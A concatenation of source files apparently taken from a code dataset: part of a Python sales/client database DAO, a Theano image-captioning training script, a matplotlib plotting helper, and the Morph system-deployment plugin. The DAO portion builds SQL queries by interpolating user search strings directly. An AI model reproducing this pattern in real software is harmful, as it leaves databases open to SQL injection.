cursor=con.cursor()
            cursor.execute(sql)  # sql must be here so the insert executes
    # TODO: still to implement update and delete
''' def eliminarCliente(self,datoelim):
con=self.conexion().connect()
sql= """ delete from cliente where id_cliente= %i """ %int(datoelim)
        #print sql  # to print the query so we can inspect it
with con:
cursor=con.cursor()
cursor.execute(sql)'''
def buscarVentaFactura(self, datobusca):
con=self.conexion().connect().cursor()
con.execute(""" select CONCAT (nombre,' ', apellido) as value, id_cliente as id from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobusca+"%") )
reporte=con.fetchall()
columna=('value', 'id')
lista=[]
for row in reporte:
lista.append(dict(zip(columna,row)))
return json.dumps(lista, indent=2)
def buscarVentaDato(self, datobuscado):
con=self.conexion().connect().cursor()
sql=""" select * from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobuscado+"%")
con.execute(sql)
reporte=con.fetchall()
return reporte
def validarventa(self, datot):
con=self.conexion().connect().cursor()
sql=""" select * from personas p, trabajador t where t.idpersona=%i """ %(datot)
con.execute(sql)
reporte=con.fetchall()
return reporte
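# --- Added illustration (not part of the original DAO) ---
# Rough usage sketch, assuming DBcon.DBcon supplies the conexion()/connect()
# chain used above; the sample values are invented.
#   dao = VentaDao()
#   dao.grabarVenta('Juan Perez', 'morning', '2015-01-27', '2015')
#   for venta in dao.reportarventa():
#       print(venta)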
license: gpl-2.0 | hash: -8,052,328,900,098,061,000 | line_mean: 32.051282 | line_max: 187 | alpha_frac: 0.558779 | autogenerated: false | ratio: 3.451235 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: erfannoury/capgen-lasagne | path: another no-ft-ln-hs-largelr.py | copies: 1 | size: 13876 | content:
from __future__ import division, print_function
import logging
import numpy as np
import scipy as sc
import skimage
from skimage import transform
import theano
import theano.tensor as T
import lasagne
import sys
import cPickle as pickle
from datetime import datetime
from collections import OrderedDict
from mscoco_threaded_iter import COCOCaptionDataset
sys.path.append('/home/noury/codevault/Recipes/modelzoo/')
sys.path.append('/home/noury/codevault/seq2seq-lasagne/')
from resnet50 import build_model
from CustomLSTMLayer import LNLSTMLayer
from HierarchicalSoftmax import HierarchicalSoftmaxLayer
from LayerNormalization import LayerNormalizationLayer
sys.setrecursionlimit(10000)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(message)s', '%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler('another_no_ft_ln_hs_largelr.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('Loading the ResNet50 model.')
# First get the ResNet50 model
resnet_weights_path = '/home/noury/modelzoo/resnet50.pkl'
resnet = build_model()
model_params = pickle.load(open(resnet_weights_path, 'rb'))
lasagne.layers.set_all_param_values(resnet['prob'], model_params['values'])
mean_im = model_params['mean_image'].reshape((1, 3, 224, 224)).astype(np.float32)
# Load the files needed for the MS COCO Captions dataset
train_images_path = '/home/noury/datasets/mscoco/train2014'
valid_images_path = '/home/noury/datasets/mscoco/val2014'
train_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_train2014.json'
valid_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_val2014.json'
coco_captions = pickle.load(open('coco_captions_trainval2014.pkl', 'rb'))
train_buckets = coco_captions['train buckets']
valid_buckets = coco_captions['valid buckets']
wordset = coco_captions['raw wordset']
word2idx = {}
word2idx['<PAD>'] = 0
word2idx['<GO>'] = 1
word2idx['<EOS>'] = 2
for i, w in enumerate(wordset):
word2idx[w] = i+3
idx2word = map(lambda x: x[0], sorted(word2idx.items(), key=lambda x: x[1]))
bucket_minibatch_sizes = {16:256, 32:128, 64:64}
logger.info('Creating global variables')
CONTINUE = False
HIDDEN_SIZE = 2048
EMBEDDING_SIZE = 300
WORD_SIZE = len(idx2word)
DENSE_SIZE = 1024
ORDER_VIOLATION_COEFF = 10.0
L2_COEFF = 1e-3
RNN_GRAD_CLIP = 64
TOTAL_MAX_NORM = 128
RECURR_LR = theano.shared(np.float32(0.001), 'recurrent lr')
EPOCH_LR_COEFF = np.float32(0.5)
NUM_EPOCHS = 15
validation_losses = []
total_loss_values = []
order_embedding_loss_values = []
l2_values = []
recurrent_norm_values = []
validation_total_loss_values = []
validation_order_embedding_loss_values = []
validation_l2_values = []
logger.info('Building the network.')
im_features = lasagne.layers.get_output(resnet['pool5'])
im_features = T.flatten(im_features, outdim=2) # batch size, number of features
cap_out_var = T.imatrix('cap_out') # batch size, seq len
cap_in_var = T.imatrix('cap_in') # batch size, seq len
mask_var = T.bmatrix('mask_var') # batch size, seq len
l_hid = lasagne.layers.InputLayer((None, HIDDEN_SIZE), input_var=im_features, name="l_hid")
gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(0.0))
cell_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=None, b=lasagne.init.Constant(0.0),
nonlinearity=lasagne.nonlinearities.tanh)
forget_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(5.0))
l_in = lasagne.layers.InputLayer((None, None), cap_in_var, name="l_in")
l_mask = lasagne.layers.InputLayer((None, None), mask_var, name="l_mask")
l_emb = lasagne.layers.EmbeddingLayer(l_in, input_size=WORD_SIZE, output_size=EMBEDDING_SIZE, name="l_emb")
l_lstm = LNLSTMLayer(l_emb, HIDDEN_SIZE, ingate=gate, forgetgate=forget_gate, cell=cell_gate,
outgate=gate, hid_init=l_hid, peepholes=False, grad_clipping=RNN_GRAD_CLIP,
mask_input=l_mask, precompute_input=False,
alpha_init=lasagne.init.Constant(0.1), # as suggested by Ryan Kiros on Twitter
normalize_cell=False,
name="l_lstm") # batch size, seq len, hidden size
l_reshape = lasagne.layers.ReshapeLayer(l_lstm, (-1, [2]), name="l_reshape") # batch size * seq len, hidden size
l_fc = lasagne.layers.DenseLayer(l_reshape, DENSE_SIZE, b=lasagne.init.Constant(5.0),
nonlinearity=lasagne.nonlinearities.rectify, name="l_fc")
l_drp = lasagne.layers.DropoutLayer(l_fc, 0.3, name="l_drp")
l_hs = HierarchicalSoftmaxLayer(l_drp, WORD_SIZE, name="l_hs") # batch size * seq len, WORD SIZE
l_slice = lasagne.layers.SliceLayer(l_lstm, -1, axis=1, name="l_slice")
if CONTINUE:
import glob
param_values = glob.glob('another_no_ft_ln_hs_largelr_param_values_*.pkl')
max_epoch = max(map(lambda x: int(x[len('another_no_ft_ln_hs_largelr_param_values_'):-len('.pkl')]), param_values))
logger.info('Continue training from epoch {}'.format(max_epoch + 1))
logger.info('Setting previous parameter values from epoch {}'.format(max_epoch))
logger.info('Setting model weights from epoch {}'.format(max_epoch))
param_values_file = 'another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(max_epoch)
param_values = pickle.load(open(param_values_file, 'rb'))
lasagne.layers.set_all_param_values(l_hs, param_values['recurrent'])
lasagne.layers.set_all_param_values(resnet['pool5'], param_values['resnet'])
RECURR_LR = theano.shared(np.float32(param_values['lr']), 'recurrent lr')
[total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values]= pickle.load(open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'rb'))
[validation_total_loss_values, validation_order_embedding_loss_values,
validation_l2_values] = pickle.load(open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'rb'))
[validation_losses, recurr_lr_val] = pickle.load(open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'rb'))
logger.info('Creating output and loss variables')
prediction = lasagne.layers.get_output(l_hs, deterministic=False)
flat_cap_out_var = T.flatten(cap_out_var, outdim=1)
flat_mask_var = T.flatten(lasagne.layers.get_output(l_mask), outdim=1)
loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
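    # Added note: the next two lines form an order-embedding penalty (in the spirit of
    # Vendrov et al.): the caption embedding should lie "below" the image embedding
    # coordinate-wise, so any positive excess of (caption - image) is squared and averaged.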
caption_features = lasagne.layers.get_output(l_slice, deterministic=False)
order_embedding_loss = T.pow(T.maximum(0, caption_features - im_features), 2).mean()
l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
total_loss = loss + ORDER_VIOLATION_COEFF * order_embedding_loss + L2_COEFF * l2
deterministic_prediction = lasagne.layers.get_output(l_hs, deterministic=True)
deterministic_captions = lasagne.layers.get_output(l_slice, deterministic=True)
deterministic_loss = T.mean(lasagne.objectives.categorical_crossentropy(deterministic_prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
deterministic_order_embedding_loss = T.pow(T.maximum(0, deterministic_captions - im_features), 2).mean()
deterministic_l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
deterministic_total_loss = deterministic_loss + ORDER_VIOLATION_COEFF * deterministic_order_embedding_loss \
+ L2_COEFF * deterministic_l2
logger.info('Getting all parameters and creating update rules.')
recurrent_params = lasagne.layers.get_all_params(l_hs, trainable=True)
recurrent_grads = T.grad(total_loss, recurrent_params)
recurrent_grads, recurrent_norm = lasagne.updates.total_norm_constraint(recurrent_grads, TOTAL_MAX_NORM, return_norm=True)
recurrent_updates = lasagne.updates.rmsprop(recurrent_grads, recurrent_params, learning_rate=RECURR_LR)
logger.info("Creating the Theano function for Adam update")
train_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[total_loss, order_embedding_loss, l2, recurrent_norm],
updates=recurrent_updates)
logger.info("Creating the evaluation Theano function")
eval_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[deterministic_total_loss, deterministic_order_embedding_loss, deterministic_l2])
logger.info('Loading the COCO Captions training and validation sets.')
coco_train = COCOCaptionDataset(train_images_path, train_annotations_filepath, train_buckets,
bucket_minibatch_sizes, word2idx, mean_im, True)
coco_valid = COCOCaptionDataset(valid_images_path, valid_annotations_filepath, valid_buckets,
bucket_minibatch_sizes, word2idx, mean_im, False)
logger.info("Starting the training process...")
START = 1
if CONTINUE:
START = max_epoch + 1
for e in xrange(START, NUM_EPOCHS + 1):
logger.info("Starting epoch".format(e))
if len(validation_losses) > 2 and \
validation_losses[-3] < validation_losses[-1] and \
validation_losses[-2] < validation_losses[-1]:
RECURR_LR.set_value(RECURR_LR.get_value() * EPOCH_LR_COEFF)
logger.info("Lowering the learning rate to {}".format(RECURR_LR.get_value()))
logger.info("Starting training on epoch {} with LR = {}".format(e, RECURR_LR.get_value()))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_train:
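        # Added note: the mask is built on the fly; <PAD> maps to index 0, so (cap_in > 0)
        # marks the real tokens of each caption.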
tl, oe, el2, recn = train_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Epoch: {}, Minibatch: {}, Total Loss: {}, Order-embedding loss: {}, L2 value: {}, Recurrent norm: {}".format(e, mb, tl, oe, el2, recn))
total_loss_values.append(tl)
order_embedding_loss_values.append(oe)
l2_values.append(el2)
recurrent_norm_values.append(recn)
mb += 1
logger.info("Training epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} results:".format(e))
logger.info("\t\tMean total loss: {}".format(np.mean(total_loss_values[-mb:])))
logger.info("\t\tMean order embedding loss: {}".format(np.mean(order_embedding_loss_values[-mb:])))
logger.info("\t\tMean l2 value: {}".format(np.mean(l2_values[-mb:])))
logger.info("\t\tMean Recurrent norm: {}".format(np.mean(recurrent_norm_values[-mb:])))
logger.info("Saving model parameters for epoch {}".format(e))
pickle.dump({'resnet':lasagne.layers.get_all_param_values(resnet['pool5']),
'recurrent':lasagne.layers.get_all_param_values(l_hs),
'mean image':mean_im,
'lr':RECURR_LR.get_value()},
open('another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(e), 'wb'), protocol=-1)
logger.info("Saving loss values for epoch {}".format(e))
pickle.dump([total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values],
open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'wb'), protocol=-1)
logger.info("Validating the model on epoch {} on the validation set.".format(e))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_valid:
tl, oe, el2 = eval_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Validation epoch: {}, Minibatch: {}, Validation total loss: {}, Validation order-embedding loss: {}, Validation l2 value: {}".format(e, mb, tl, oe, el2))
validation_total_loss_values.append(tl)
validation_order_embedding_loss_values.append(oe)
validation_l2_values.append(el2)
mb += 1
logger.info("Validating epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} validation results:".format(e))
logger.info("\t\tValidation mean total loss: {}".format(np.mean(validation_total_loss_values[-mb:])))
logger.info("\t\tValidation mean order-embedding loss: {}".format(np.mean(validation_order_embedding_loss_values[-mb:])))
logger.info("\t\tValidation mean l2 value: {}".format(np.mean(validation_l2_values[-mb:])))
validation_losses.append(np.mean(validation_total_loss_values[-mb:]))
logger.info("Saving validation loss values for epoch {}".format(e))
pickle.dump([validation_total_loss_values, validation_order_embedding_loss_values, validation_l2_values],
open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'wb'), protocol=-1)
pickle.dump([validation_losses, RECURR_LR.get_value()], open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'wb'),
protocol=-1)
|
mit
| 2,184,633,508,584,648,400
| 55.868852
| 179
| 0.652061
| false
| 3.374514
| false
| false
| false
|
goulu/Goulib
|
Goulib/plot.py
|
1
|
4898
|
"""
plotable rich object display on IPython/Jupyter notebooks
"""
__author__ = "Philippe Guglielmetti"
__copyright__ = "Copyright 2015, Philippe Guglielmetti"
__credits__ = []
__license__ = "LGPL"
# import matplotlib and set backend once for all
from . import itertools2
import os
import io
import sys
import logging
import base64
import matplotlib
if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?
matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend
elif sys.gettrace(): # http://stackoverflow.com/questions/333995/how-to-detect-that-python-code-is-being-executed-through-the-debugger
matplotlib.use('Agg') # because 'QtAgg' crashes python while debugging
else:
pass
# matplotlib.use('pdf') #for high quality pdf, but doesn't work for png, svg ...
logging.info('matplotlib backend is %s' % matplotlib.get_backend())
class Plot(object):
"""base class for plotable rich object display on IPython notebooks
inspired from http://nbviewer.ipython.org/github/ipython/ipython/blob/3607712653c66d63e0d7f13f073bde8c0f209ba8/docs/examples/notebooks/display_protocol.ipynb
"""
def _plot(self, ax, **kwargs):
"""abstract method, must be overriden
:param ax: `matplotlib.axis`
:return ax: `matplotlib.axis` after plot
"""
raise NotImplementedError(
'objects derived from plot.PLot must define a _plot method')
return ax
def render(self, fmt='svg', **kwargs):
return render([self], fmt, **kwargs) # call global function
def save(self, filename, **kwargs):
return save([self], filename, **kwargs) # call global function
# for IPython notebooks
def _repr_html_(self):
"""default rich format is svg plot"""
try:
return self._repr_svg_()
except NotImplementedError:
pass
# this returns the same as _repr_png_, but is Table compatible
buffer = self.render('png')
s = base64.b64encode(buffer).decode('utf-8')
return '<img src="data:image/png;base64,%s">' % s
def html(self, **kwargs):
from IPython.display import HTML
return HTML(self._repr_html_(**kwargs))
def svg(self, **kwargs):
from IPython.display import SVG
return SVG(self._repr_svg_(**kwargs))
def _repr_svg_(self, **kwargs):
return self.render(fmt='svg', **kwargs).decode('utf-8')
def png(self, **kwargs):
from IPython.display import Image
return Image(self._repr_png_(**kwargs), embed=True)
def _repr_png_(self, **kwargs):
return self.render(fmt='png', **kwargs)
def plot(self, **kwargs):
""" renders on IPython Notebook
(alias to make usage more straightforward)
"""
return self.svg(**kwargs)
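# Illustrative sketch (added, not part of Goulib): the smallest useful Plot subclass.
# The only contract is that _plot draws on the given matplotlib axis and returns it;
# 'label' and 'offset' are the keyword arguments forwarded by the module-level render() below.
class _ExampleLine(Plot):
    def _plot(self, ax, label=None, offset=0, **kwargs):
        ax.plot([0, 1], [0 + offset, 1 + offset], label=label)
        return ax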
def render(plotables, fmt='svg', **kwargs):
"""renders several Plot objects"""
import matplotlib.pyplot as plt
# extract optional arguments used for rasterization
printargs, kwargs = itertools2.dictsplit(
kwargs,
['dpi', 'transparent', 'facecolor', 'background', 'figsize']
)
ylim = kwargs.pop('ylim', None)
xlim = kwargs.pop('xlim', None)
title = kwargs.pop('title', None)
fig, ax = plt.subplots()
labels = kwargs.pop('labels', [None] * len(plotables))
# slightly shift the points to make superimposed curves more visible
offset = kwargs.pop('offset', 0)
for i, obj in enumerate(plotables):
if labels[i] is None:
labels[i] = str(obj)
if not title:
try:
title = obj._repr_latex_()
# check that title can be used in matplotlib
from matplotlib.mathtext import MathTextParser
parser = MathTextParser('path').parse(title)
except Exception as e:
title = labels[i]
ax = obj._plot(ax, label=labels[i], offset=i * offset, **kwargs)
if ylim:
plt.ylim(ylim)
if xlim:
plt.xlim(xlim)
ax.set_title(title)
if len(labels) > 1:
ax.legend()
output = io.BytesIO()
fig.savefig(output, format=fmt, **printargs)
data = output.getvalue()
plt.close(fig)
return data
def png(plotables, **kwargs):
from IPython.display import Image
return Image(render(plotables, 'png', **kwargs), embed=True)
def svg(plotables, **kwargs):
from IPython.display import SVG
return SVG(render(plotables, 'svg', **kwargs))
plot = svg
def save(plotables, filename, **kwargs):
ext = filename.split('.')[-1].lower()
kwargs.setdefault('dpi', 600) # force good quality
return open(filename, 'wb').write(render(plotables, ext, **kwargs))
|
lgpl-3.0
| 139,288,707,879,006,940
| 29.6
| 161
| 0.611066
| false
| 3.799845
| false
| false
| false
|
nuxeh/morph
|
morphlib/plugins/deploy_plugin.py
|
1
|
29928
|
# Copyright (C) 2013-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import uuid
import cliapp
import morphlib
class DeployPlugin(cliapp.Plugin):
def enable(self):
group_deploy = 'Deploy Options'
self.app.settings.boolean(['upgrade'],
'specify that you want to upgrade an '
'existing cluster. Deprecated: use the '
'`morph upgrade` command instead',
group=group_deploy)
self.app.add_subcommand(
'deploy', self.deploy,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
self.app.add_subcommand(
'upgrade', self.upgrade,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
def disable(self):
pass
def deploy(self, args):
'''Deploy a built system image or a set of images.
Command line arguments:
* `CLUSTER` is the name of the cluster to deploy.
* `DEPLOYMENT...` is the name of zero or more deployments in the
morphology to deploy. If none are specified then all deployments
in the morphology are deployed.
* `SYSTEM.KEY=VALUE` can be used to assign `VALUE` to a parameter
named `KEY` for the system identified by `SYSTEM` in the cluster
morphology (see below). This will override parameters defined
in the morphology.
Morph deploys a set of systems listed in a cluster morphology.
"Deployment" here is quite a general concept: it covers anything
where a system image is taken, configured, and then put somewhere
where it can be run. The deployment mechanism is quite flexible,
and can be extended by the user.
A cluster morphology defines a list of systems to deploy, and
for each system a list of ways to deploy them. It contains the
following fields:
* **name**: MUST be the same as the basename of the morphology
filename, sans .morph suffix.
* **kind**: MUST be `cluster`.
* **systems**: a list of systems to deploy;
the value is a list of mappings, where each mapping has the
following keys:
* **morph**: the system morphology to use in the specified
commit.
* **deploy**: a mapping where each key identifies a
system and each system has at least the following keys:
          * **type**: identifies the type of deployment e.g. (kvm,
nfsboot) (see below).
* **location**: where the deployed system should end up
at. The syntax depends on the deployment type (see below).
Any additional item on the dictionary will be added to the
environment as `KEY=VALUE`.
* **deploy-defaults**: allows multiple deployments of the same
system to share some settings, when they can. Default settings
will be overridden by those defined inside the deploy mapping.
# Example
name: cluster-foo
kind: cluster
systems:
- morph: devel-system-x86_64-generic.morph
deploy:
cluster-foo-x86_64-1:
type: kvm
location: kvm+ssh://user@host/x86_64-1/x86_64-1.img
HOSTNAME: cluster-foo-x86_64-1
DISK_SIZE: 4G
RAM_SIZE: 4G
VCPUS: 2
- morph: devel-system-armv7-highbank
deploy-defaults:
type: nfsboot
location: cluster-foo-nfsboot-server
deploy:
cluster-foo-armv7-1:
HOSTNAME: cluster-foo-armv7-1
cluster-foo-armv7-2:
HOSTNAME: cluster-foo-armv7-2
Each system defined in a cluster morphology can be deployed in
multiple ways (`type` in a cluster morphology). Morph provides
the following types of deployment:
* `tar` where Morph builds a tar archive of the root file system.
* `rawdisk` where Morph builds a raw disk image and sets up the
image with a bootloader and configuration so that it can be
booted. Disk size is set with `DISK_SIZE` (see below).
* `virtualbox-ssh` where Morph creates a VirtualBox disk image,
and creates a new virtual machine on a remote host, accessed
over ssh. Disk and RAM size are set with `DISK_SIZE` and
`RAM_SIZE` (see below).
* `kvm`, which is similar to `virtualbox-ssh`, but uses libvirt
and KVM instead of VirtualBox. Disk and RAM size are set with
`DISK_SIZE` and `RAM_SIZE` (see below).
* `nfsboot` where Morph creates a system to be booted over
a network.
* `ssh-rsync` where Morph copies a binary delta over to the target
system and arranges for it to be bootable. This requires
`system-version-manager` from the tbdiff chunk
* `initramfs`, where Morph turns the system into an initramfs image,
suitable for being used as the early userland environment for a
system to be able to locate more complicated storage for its root
file-system, or on its own for diskless deployments.
There are additional extensions that currently live in the Baserock
definitions repo (baserock:baserock/definitions). These include:
* `image-package` where Morph creates a tarball that includes scripts
that can be used to make disk images outside of a Baserock
environment. The example in definitions.git will create scripts for
generating disk images and installing to existing disks.
        * `sdk` where Morph generates something resembling a BitBake SDK, which
provides a toolchain for building software to target a system built
by Baserock, from outside of a Baserock environment. This creates a
self-extracting shell archive which you pass a directory to extract
to, and inside that has a shell snippet called
environment-setup-$TARGET which can be used to set environment
variables to use the toolchain.
* `pxeboot` where Morph temporarily network-boots the system you are
deploying, so it can install a more permanent system onto local
storage.
In addition to the deployment type, the user must also give
a value for `location`. Its syntax depends on the deployment
types. The deployment types provided by Morph use the
following syntaxes:
* `tar`: pathname to the tar archive to be created; for
example, `/home/alice/testsystem.tar`
* `rawdisk`: pathname to the disk image to be created; for
example, `/home/alice/testsystem.img`
* `virtualbox-ssh` and `kvm`: a custom URL scheme that
provides the target host machine (the one that runs
VirtualBox or `kvm`), the name of the new virtual machine,
and the location on the target host of the virtual disk
file. The target host is accessed over ssh. For example,
`vbox+ssh://alice@192.168.122.1/testsys/home/alice/testsys.vdi`
or `kvm+ssh://alice@192.168.122.1/testsys/home/alice/testys.img`
where
* `alice@192.168.122.1` is the target as given to ssh,
**from within the development host** (which may be
different from the target host's normal address);
* `testsys` is the new VM's name;
* `/home/alice/testsys.vdi` and `/home/alice/testys.img` are
the pathnames of the disk image files on the target host.
* `nfsboot`: the address of the nfsboot server. (Note this is just
the _address_ of the trove, _not_ `user@...`, since `root@` will
automatically be prepended to the server address.)
        In addition to the `location` parameter, deployments can take additional
`KEY=VALUE` parameters. These can be provided in the following ways:
1. In the cluster definition file, e.g.
...
systems:
- morph: systems/foo-system.morph
deploy:
foo:
HOSTNAME: foo
2. In the environment before running e.g.
`HOSTNAME=foo morph deploy ...`
3. On the command-line e.g.
`morph deploy clusters/foo.morph foo.HOSTNAME=foo`
For any boolean `KEY=VALUE` parameters, allowed values are:
+ve `yes`, `1`, `true`;
-ve `no`, `0`, `false`;
The following `KEY=VALUE` parameters are supported for `rawdisk`,
        `virtualbox-ssh` and `kvm` deployment types:
* `DISK_SIZE=X` to set the size of the disk image. `X` should use a
suffix of `K`, `M`, or `G` (in upper or lower case) to indicate
kilo-, mega-, or gigabytes. For example, `DISK_SIZE=100G` would
create a 100 gigabyte disk image. **This parameter is mandatory**.
The `kvm` and `virtualbox-ssh` deployment types support an additional
parameter:
* `RAM_SIZE=X` to set the size of virtual RAM for the virtual
machine. `X` is interpreted in the same was as `DISK_SIZE`,
and defaults to `1G`.
* `AUTOSTART=<VALUE>` - allowed values are `yes` and `no`
(default)
For the `nfsboot` write extension,
* the following `KEY=VALUE` pairs are mandatory
* `NFSBOOT_CONFIGURE=yes` (or any non-empty value). This
enables the `nfsboot` configuration extension (see
below) which MUST be used when using the `nfsboot`
write extension.
* `HOSTNAME=<STRING>` a unique identifier for that system's
`nfs` root when it's deployed on the nfsboot server - the
extension creates a directory with that name for the `nfs`
root, and stores kernels by that name for the tftp server.
* the following `KEY=VALUE` pairs are optional
* `VERSION_LABEL=<STRING>` - set the name of the system
version being deployed, when upgrading. Defaults to
"factory".
Each deployment type is implemented by a **write extension**. The
ones provided by Morph are listed above, but users may also
create their own by adding them in the same git repository
and branch as the system morphology. A write extension is a
script that does whatever is needed for the deployment. A write
extension is passed two command line parameters: the name of an
unpacked directory tree that contains the system files (after
configuration, see below), and the `location` parameter.
Regardless of the type of deployment, the image may be
configured for a specific deployment by using **configuration
extensions**. The extensions are listed in the system morphology
file:
...
configuration-extensions:
- set-hostname
The above specifies that the extension `set-hostname` is to
be run. Morph will run all the configuration extensions listed
in the system morphology, and no others. (This way, configuration
is more easily tracked in git.)
Configuration extensions are scripts that get the unpacked
directory tree of the system as their parameter, and do whatever
is needed to configure the tree.
Morph provides the following configuration extension built in:
* `set-hostname` sets the hostname of the system to the value
of the `HOSTNAME` variable.
* `nfsboot` configures the system for nfsbooting. This MUST
be used when deploying with the `nfsboot` write extension.
Any `KEY=VALUE` parameters given in `deploy` or `deploy-defaults`
sections of the cluster morphology, or given through the command line
are set as environment variables when either the configuration or the
write extension runs (except `type` and `location`).
Deployment configuration is stored in the deployed system as
/baserock/deployment.meta. THIS CONTAINS ALL ENVIRONMENT VARIABLES SET
DURING DEPLOYMENT, so make sure you have no sensitive information in
your environment that is being leaked. As a special case, any
environment/deployment variable that contains 'PASSWORD' in its name is
stripped out and not stored in the final system.
'''
# Nasty hack to allow deploying things of a different architecture
def validate(self, root_artifact):
pass
morphlib.buildcommand.BuildCommand._validate_architecture = validate
if not args:
raise cliapp.AppException(
'Too few arguments to deploy command (see help)')
        # Raise an exception if there is not enough space in tempdir.
        # The second pair of arguments ('/' as the path, 0 as the minimum size) is a no-op;
        # it exists because it is complicated to check the available
        # disk space when the directories may be on the same device.
morphlib.util.check_disk_available(
self.app.settings['tempdir'],
self.app.settings['tempdir-min-space'],
'/', 0)
ws = morphlib.workspace.open('.')
sb = morphlib.sysbranchdir.open_from_within('.')
cluster_filename = morphlib.util.sanitise_morphology_path(args[0])
cluster_filename = sb.relative_to_root_repo(cluster_filename)
build_uuid = uuid.uuid4().hex
build_command = morphlib.buildcommand.BuildCommand(self.app)
build_command = self.app.hookmgr.call('new-build-command',
build_command)
loader = morphlib.morphloader.MorphologyLoader()
name = morphlib.git.get_user_name(self.app.runcmd)
email = morphlib.git.get_user_email(self.app.runcmd)
build_ref_prefix = self.app.settings['build-ref-prefix']
root_repo_dir = morphlib.gitdir.GitDirectory(
sb.get_git_directory_name(sb.root_repository_url))
cluster_text = root_repo_dir.read_file(cluster_filename)
cluster_morphology = loader.load_from_string(cluster_text,
filename=cluster_filename)
if cluster_morphology['kind'] != 'cluster':
raise cliapp.AppException(
"Error: morph deployment commands are only supported for "
"cluster morphologies.")
# parse the rest of the args
all_subsystems = set()
all_deployments = set()
deployments = set()
for system in cluster_morphology['systems']:
all_deployments.update(system['deploy'].iterkeys())
if 'subsystems' in system:
all_subsystems.update(loader._get_subsystem_names(system))
for item in args[1:]:
if not item in all_deployments:
break
deployments.add(item)
env_vars = args[len(deployments) + 1:]
self.validate_deployment_options(
env_vars, all_deployments, all_subsystems)
if self.app.settings['local-changes'] == 'include':
bb = morphlib.buildbranch.BuildBranch(sb, build_ref_prefix)
pbb = morphlib.buildbranch.pushed_build_branch(
bb, loader=loader, changes_need_pushing=False,
name=name, email=email, build_uuid=build_uuid,
status=self.app.status)
with pbb as (repo, commit, original_ref):
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
else:
repo = sb.get_config('branch.root')
ref = sb.get_config('branch.name')
commit = root_repo_dir.resolve_ref_to_commit(ref)
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
self.app.status(msg='Finished deployment')
def validate_deployment_options(
self, env_vars, all_deployments, all_subsystems):
for var in env_vars:
for subsystem in all_subsystems:
if subsystem == var:
raise cliapp.AppException(
'Cannot directly deploy subsystems. Create a top '
'level deployment for the subsystem %s instead.' %
subsystem)
if (not any(deployment in var
for deployment in all_deployments)
and not subsystem in var):
raise cliapp.AppException(
'Variable referenced a non-existent deployment '
'name: %s' % var)
def deploy_cluster(self, build_command, cluster_morphology, root_repo_dir,
repo, commit, env_vars, deployments):
# Create a tempdir for this deployment to work in
deploy_tempdir = tempfile.mkdtemp(
dir=os.path.join(self.app.settings['tempdir'], 'deployments'))
try:
for system in cluster_morphology['systems']:
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, repo, commit, system,
env_vars, deployments,
parent_location='')
finally:
shutil.rmtree(deploy_tempdir)
def deploy_system(self, build_command, deploy_tempdir,
root_repo_dir, build_repo, ref, system, env_vars,
deployment_filter, parent_location):
sys_ids = set(system['deploy'].iterkeys())
if deployment_filter and not \
any(sys_id in deployment_filter for sys_id in sys_ids):
return
